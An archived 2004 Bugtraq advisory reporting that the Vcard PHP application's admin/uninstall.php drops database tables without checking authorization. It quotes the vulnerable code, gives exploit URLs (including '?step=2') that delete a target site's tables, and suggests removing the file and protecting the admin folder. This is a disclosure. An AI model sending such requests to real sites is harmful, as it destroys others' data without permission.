| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 17 Mar 2004 22:21:38 -0000
From: saudi linux <ksa2ksa@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Vcard 2.8 uninstall script problem
Informations :
°°°°°°°°°°°°°°
Procduct: Vcard
Version : 2.9 may other VER
Problems : File uninstall & delete the table
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/admin/uninstall.php :
------------------------------------------------------------------------
[...]
<?
$step = $HTTP_GET_VARS['step'];
if (empty($step))
{
echo "<p><b>Are you sure, uninstall vCard database tables and them contents?</b></p>";
echo "<p>Yes, I'm sure. <a href='$PHP_SELF?step=2'>Click here to continue --></a></p>";
}
if ($step == 2)
{
include "./config.inc.php";
include("./db_mysql.inc.php");
include("./functions.inc.php");
$DB_site = new DB_Sql_vc;
$DB_site->server = $hostname;
$DB_site->user = $dbUser;
$DB_site->password = $dbPass;
$DB_site->database = $dbName;
$DB_site->connect();
$dbPass = "";
$DB_site->password = "";
//*********************************************
$DB_site->query("DROP TABLE IF EXISTS vcard_abook ");
$DB_site->query("DROP TABLE IF EXISTS vcard_account ");
?>
As u can see the script does not Check User Authorization
Exploit:
°°°°°°°°°°
http://[target]/[Vcard folder]/admin/uninstall.php
or
http://[target]/[Vcard folder]/admin/uninstall.php?step=2
patch:
°°°°°°°°°°
remove uninstall.php and protect admin folder by .htaccess
Saudi Linux
KSA o0 KSA 0o
Powered by blists - more mailing lists